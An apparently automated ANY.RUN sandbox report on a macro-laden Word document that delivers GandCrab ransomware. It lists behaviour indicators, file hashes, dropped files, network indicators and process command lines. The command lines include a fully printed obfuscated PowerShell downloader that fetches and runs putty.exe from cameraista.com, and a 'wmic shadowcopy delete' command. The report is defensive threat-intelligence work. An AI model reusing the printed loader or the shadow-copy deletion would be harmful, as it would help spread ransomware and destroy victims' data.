analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Emergеnсyеxitmар.doc

Full analysis: https://app.any.run/tasks/fc4e9de0-44ee-4504-afcf-2be8180663aa
Verdict: Malicious activity
Threats:

GandCrab is probably one of the most famous Ransomware. A Ransomware is a malware that asks the victim to pay money in order to restore access to encrypted files. If the user does not cooperate the files are forever lost.

Analysis date: January 23, 2019, 08:01:13
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
ransomware
gandcrab
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: admin, Template: Normal.dotm, Last Saved By: Admin, Revision Number: 4, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Jan 22 19:27:00 2019, Last Saved Time/Date: Tue Jan 22 19:28:00 2019, Number of Pages: 1, Number of Words: 10, Number of Characters: 57, Security: 0
MD5:

D489E42E0AAC01A5D4C07E2976414559

SHA1:

0FDC67E6804997047A2FF884A368968F6CE3BBEB

SHA256:

C69B49DE3046C74B69DA1CF8AF7C065430292340CE1959B1AF973A329F585251

SSDEEP:

384:QJjFiSAoKXMVkkY4Tlps1tzI1vJO0ahnadSVSrvxWdimCMg0jQ9NZA:lMVkpelpys3dSVSrvQdijh9g

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 2972)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2972)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3936)
    • Application was dropped or rewritten from another process

      • putty.exe (PID: 3088)
    • GandCrab keys found

      • putty.exe (PID: 3088)
    • Writes file to Word startup folder

      • putty.exe (PID: 3088)
    • Actions looks like stealing of personal data

      • putty.exe (PID: 3088)
    • Deletes shadow copies

      • putty.exe (PID: 3088)
    • Renames files like Ransomware

      • putty.exe (PID: 3088)
    • Changes settings of System certificates

      • putty.exe (PID: 3088)
    • Dropped file may contain instructions of ransomware

      • putty.exe (PID: 3088)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3936)
      • putty.exe (PID: 3088)
    • Creates files in the Windows directory

      • powershell.exe (PID: 3936)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3936)
    • Creates files in the program directory

      • putty.exe (PID: 3088)
    • Reads the cookies of Mozilla Firefox

      • putty.exe (PID: 3088)
    • Creates files like Ransomware instruction

      • putty.exe (PID: 3088)
    • Adds / modifies Windows certificates

      • putty.exe (PID: 3088)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2972)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2972)
    • Dropped object may contain TOR URL's

      • putty.exe (PID: 3088)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: admin
Keywords: -
Template: Normal.dotm
LastModifiedBy: Admin
RevisionNumber: 4
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:01:22 19:27:00
ModifyDate: 2019:01:22 19:28:00
Pages: 1
Words: 10
Characters: 57
Security: None
CodePage: Windows Cyrillic
Company: Salve
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 66
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Название
  • 1
CompObjUserTypeLen: 32
CompObjUserType: ???????? Microsoft Word 97-2003
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
5
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs powershell.exe #GANDCRAB putty.exe wmic.exe vssvc.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2972"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Emergеnсyеxitmар.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3936powershell $VF0eh2ayk = '61792.984793878$oMis7B = 61792.984793878n61792.984793878e61792.984793878w61792.984793878-obj61792.984793878e61792.984793878c61792.984793878t n61792.984793878e61792.984793878t61792.984793878.w61792.984793878e61792.984793878b61792.984793878cli61792.984793878ent; $oMis7B.d61792.984793878o61792.984793878w61792.984793878n61792.984793878l61792.984793878o61792.984793878a61792.984793878d61792.984793878f61792.984793878i61792.984793878le(\"61792.984793878h61792.984793878t61792.984793878t61792.984793878p61792.984793878://cameraista.com/olalala/putty.exe\", \"c:\win61792.984793878dows\t61792.984793878emp\put61792.984793878t61792.984793878y61792.984793878.61792.984793878e61792.984793878x61792.984793878e\"); 61792.984793878s61792.984793878tar61792.984793878t-p61792.984793878r61792.984793878o61792.984793878ces61792.984793878s \"c:\win61792.984793878d61792.984793878o61792.984793878ws\temp\p61792.984793878u61792.984793878t61792.984793878t61792.984793878y.ex61792.984793878e\";'.replace('61792.984793878', $mIR9DCa);$K7QH4bT = '';iex($VF0eh2ayk);C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3088"C:\windows\temp\putty.exe" C:\windows\temp\putty.exe
powershell.exe
User:
admin
Company:
Nullsoft, Inc.
Integrity Level:
MEDIUM
Description:
Audience Need Zimmerman
Version:
3.1.22.6
2196"C:\Windows\system32\wbem\wmic.exe" shadowcopy deleteC:\Windows\system32\wbem\wmic.exe
putty.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
WMI Commandline Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3628C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exeservices.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Microsoft® Volume Shadow Copy Service
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 535
Read events
1 023
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
426
Text files
322
Unknown types
15

Dropped files

PID
Process
Filename
Type
2972WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR6CC4.tmp.cvr
MD5:
SHA256:
3936powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MMM8E4BFK1YXYX1CK111.temp
MD5:
SHA256:
3088putty.exeC:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\boot.sdi
MD5:
SHA256:
3088putty.exeC:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\Winre.wim.jnuvza
MD5:
SHA256:
2972WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:5ECE24F3F1EF45DF98B3BDC75593F895
SHA256:70F1B8A93D9ABA9BA83B201E9A839228FCCBA2D51668776E263A6FA1EB20C828
3936powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:6073B6FC66D2E68644893344F6904E4A
SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
2972WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:C569802DB5849779F22174B9AB0F135F
SHA256:6C3CAD88468FE63910B07989B21F7D4FABE3C3BD098CFFAF6E32CA3A869558B7
3088putty.exeC:\System Volume Information\SPP\OnlineMetadataCache\{05ed3515-06b3-48f6-8cf2-bf24b1bf0727}_OnDiskSnapshotProp
MD5:
SHA256:
3936powershell.exeC:\windows\temp\putty.exeexecutable
MD5:B6E45A0CDADC8A2A9561D0C207DA465B
SHA256:F7EEDA93BCDE57D67B4A418077AE47F1F922FAB7188A994CB1795CE6D833EEB8
3088putty.exeC:\$Recycle.Bin\S-1-5-21-1302019708-1500728564-335382590-1000\JNUVZA-DECRYPT.txttext
MD5:8C44CD75620502C85420EA55FE7D27CE
SHA256:BFD3A84E2072EC02F69FE53B569C219035ECE5D6C7AD2AA753455C4336984C68
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
3
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3936
powershell.exe
GET
200
205.185.117.187:80
http://cameraista.com/olalala/putty.exe
US
executable
641 Kb
suspicious
3088
putty.exe
GET
301
138.201.162.99:80
http://www.kakaocorp.link/
DE
html
162 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3088
putty.exe
138.201.162.99:80
www.kakaocorp.link
Hetzner Online GmbH
DE
malicious
3088
putty.exe
138.201.162.99:443
www.kakaocorp.link
Hetzner Online GmbH
DE
malicious
3936
powershell.exe
205.185.117.187:80
cameraista.com
FranTech Solutions
US
suspicious

DNS requests

Domain
IP
Reputation
cameraista.com
  • 205.185.117.187
suspicious
www.kakaocorp.link
  • 138.201.162.99
malicious

Threats

PID
Process
Class
Message
3936
powershell.exe
Potentially Bad Traffic
ET INFO Possibly Suspicious Request for Putty.exe from Non-Standard Download Location
3936
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3936
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
No debug info